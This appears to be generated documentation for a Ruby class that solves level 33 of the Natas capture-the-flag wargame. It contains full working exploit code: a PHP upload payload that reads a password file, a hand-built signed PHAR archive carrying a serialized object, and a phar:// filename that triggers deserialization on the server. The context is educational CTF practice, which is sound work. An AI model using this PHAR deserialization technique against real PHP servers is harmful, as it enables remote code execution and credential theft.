Class: NatasLevel33

Inherits:
NatasLevelBase
Defined in:
lib/natas.rb

Overview

Level 33 — uploads a PHP payload and a hand-built PHAR archive whose manifest metadata is a serialized `Executor` object, then submits a `phar://` path as the upload filename so that the metadata is (presumably) unserialized server-side and the payload prints the natas34 password.

Constant Summary

LEVEL =
33
PAGE =
'/'
MAX_FILESIZE =
4096
PAYLOAD_FILENAME =
'payload.php'
PHAR_FILENAME =
'payload.phar'
PHARNAME =
'phar://payload.phar/empty.php'
PAYLOAD =
%(Password: <?php echo file_get_contents("#{WEBPASS}/natas34"); ?>)

Constants inherited from NatasLevelBase

NatasLevelBase::HOST, NatasLevelBase::LOGIN, NatasLevelBase::PASSWORD_LENGTH, NatasLevelBase::PORT, NatasLevelBase::WEBPASS

Instance Attribute Summary

Attributes inherited from NatasLevelBase

#login, #password

Instance Method Summary

Methods inherited from NatasLevelBase

#get, #initialize, #level, #post

Constructor Details

This class inherits a constructor from NatasLevelBase

Instance Method Details

#execObject



# File 'lib/natas.rb', line 955

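# Solve level 33.
#
# Three requests are made against PAGE:
#   1. upload PAYLOAD under the name PAYLOAD_FILENAME;
#   2. upload a signed PHAR archive (PHAR_FILENAME) whose manifest metadata is
#      a serialized `Executor` object referencing PAYLOAD_FILENAME together
#      with the MD5 hex digest of PAYLOAD;
#   3. submit PHARNAME (a phar:// path into that archive) as the filename
#      with an oversized body. Presumably the server touches the phar:// path
#      before rejecting the upload, which is what triggers unserialization of
#      the metadata — the level's PHP source is not visible here, so verify
#      against it if the trigger stops working.
#
# The archive is assembled with `pack` so the manifest and metadata length
# fields always agree with PAYLOAD_FILENAME and the digest; the previous
# hard-coded lengths (0xD4 / 0x9D) were only valid for 'payload.php' and
# would silently yield a corrupt PHAR for any other filename.
#
# @return [void] reports the password via #found, or calls #not_found when
#   the response has no "Password: ..." line
def exec
  payload_signature = Digest::MD5.hexdigest(PAYLOAD)
  log("Payload MD5 signature: #{payload_signature}")

  phar_payload = build_phar_payload(payload_signature)

  log("Uploading file with payload: #{PAYLOAD_FILENAME}")
  data = [
    ['filename', PAYLOAD_FILENAME],
    ['uploadedfile', PAYLOAD, { filename: 'uploadedfile' }]
  ]
  post(PAGE, {}, data, multipart: true)

  log("Uploading file with PHAR payload: #{PHAR_FILENAME}")
  data = [
    ['filename', PHAR_FILENAME],
    ['uploadedfile', phar_payload, { filename: 'uploadedfile' }]
  ]
  post(PAGE, {}, data, multipart: true)

  # Deliberately one byte over MAX_FILESIZE: the content of this upload is
  # irrelevant, only the phar:// filename matters.
  log("Executing PHAR payload: #{PHARNAME}")
  data = [
    ['filename', PHARNAME],
    ['uploadedfile', "\x00" * (MAX_FILESIZE + 1), { filename: 'uploadedfile' }]
  ]
  body = post(PAGE, {}, data, multipart: true).body

  match = /Password: (\w+)/.match(body)
  not_found unless match
  found(match[1])
end

# Build a minimal, SHA-1 signed PHAR archive holding one empty file
# (`empty.php`) and, as manifest metadata, a serialized `Executor` object
# whose private `filename` is PAYLOAD_FILENAME, whose private `signature`
# is +payload_signature+ and whose private `init` is false.
#
# Layout (integers little-endian unless noted):
#   stub | manifest length | manifest | SHA-1 of everything before | type 2 | "GBMB"
#
# @param payload_signature [String] hex MD5 of PAYLOAD, presumably compared
#   server-side against the MD5 of the uploaded payload file
# @return [String] the complete archive, ASCII-8BIT encoded
private def build_phar_payload(payload_signature)
  # PHP serialization of Executor; the \x00-wrapped names mark private properties.
  metadata = %(O:8:"Executor":3:{s:18:"\x00Executor\x00filename";s:#{PAYLOAD_FILENAME.bytesize}:"#{PAYLOAD_FILENAME}";s:19:"\x00Executor\x00signature";s:#{payload_signature.bytesize}:"#{payload_signature}";s:14:"\x00Executor\x00init";b:0;}).b

  entry_name = 'empty.php'.b
  # name length, name, uncompressed size, mtime, compressed size, CRC32,
  # flags (0664 permission bits), per-file metadata length.
  file_entry = [entry_name.bytesize].pack('V') + entry_name +
               [0, 0x61539C8C, 0, 0, 0o664, 0].pack('V6')

  # entry count, API version 0x1100 (written as bytes 0x11 0x00 — the one
  # field here that is not little-endian), global flags 0x10000 (signature
  # present), alias length, metadata length, metadata, file entries.
  manifest = [1].pack('V') +
             [0x1100].pack('n') +
             [0x00010000].pack('V') +
             [0].pack('V') +
             [metadata.bytesize].pack('V') +
             metadata +
             file_entry

  phar = "<?php __HALT_COMPILER(); ?>\r\n".b + [manifest.bytesize].pack('V') + manifest

  phar_signature = Digest::SHA1.digest(phar)
  log("PHAR SHA1 signature: #{phar_signature.unpack1('H*')}")
  # Trailer: raw signature, signature type 2 (SHA-1), magic "GBMB".
  phar + phar_signature + [2].pack('V') + 'GBMB'.b
end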